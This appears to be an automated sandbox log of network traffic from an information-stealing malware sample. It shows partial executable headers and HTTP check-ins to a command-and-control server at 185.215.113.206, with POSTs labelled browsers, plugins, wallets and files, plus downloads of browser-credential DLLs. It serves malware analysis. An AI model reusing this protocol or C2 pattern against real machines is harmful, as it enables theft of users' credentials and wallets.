Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 09:34:22 GMTContent-Type: application/octet-streamContent-Length: 2805248Last-Modified: Mon, 11 Nov 2024 09:05:32 GMTConnection: keep-aliveETag: "6731c8dc-2ace00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 c2 b6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 75 6c 67 6c 73 77 72 00 80 2a 00 00 a0 00 00 00 6e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 7a 66 67 6c 69 75 73 00 20 00 00 00 20 2b 00 00 04 00 00 00 a8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 ac 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 09:34:40 GMTContent-Type: application/octet-streamContent-Length: 1845248Last-Modified: Mon, 11 Nov 2024 09:18:03 GMTConnection: keep-aliveETag: "6731cbcb-1c2800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 d0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 6b 00 00 04 00 00 7f 5e 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2b 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6c 78 64 64 75 6c 6f 00 90 1a 00 00 30 50 00 00 8a 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 78 73 72 71 66 6c 7a 00 10 00 00 00 c0 6a 00 00 06 00 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 6a 00 00 22 00 00 00 06 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 09:35:02 GMTContent-Type: application/octet-streamContent-Length: 1845248Last-Modified: Mon, 11 Nov 2024 09:18:03 GMTConnection: keep-aliveETag: "6731cbcb-1c2800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 d0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 6b 00 00 04 00 00 7f 5e 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2b 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6c 78 64 64 75 6c 6f 00 90 1a 00 00 30 50 00 00 8a 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 78 73 72 71 66 6c 7a 00 10 00 00 00 c0 6a 00 00 06 00 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 6a 00 00 22 00 00 00 06 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 2d 2d 0d 0a Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="build"mars------JJKEBGHJKFIDGCAAFCAF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"browsers------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="message"plugins------JEGHDAFIDGDAAKEBFHDA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGDBAFHJJDAKEBGCFCBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="message"fplugins------AEGDBAFHJJDAKEBGCFCB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAAHost: 185.215.113.206Content-Length: 7235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIHost: 185.215.113.206Content-Length: 999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="file"------BAKJKFHCAEGDHIDGDHDA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 2d 2d 0d 0a Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file"------JKECGDBFCBKFIDHIDHDH--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="message"wallets------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 2d 2d 0d 0a Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="message"files------HIDAFHDHCBGDGCBGCGII--
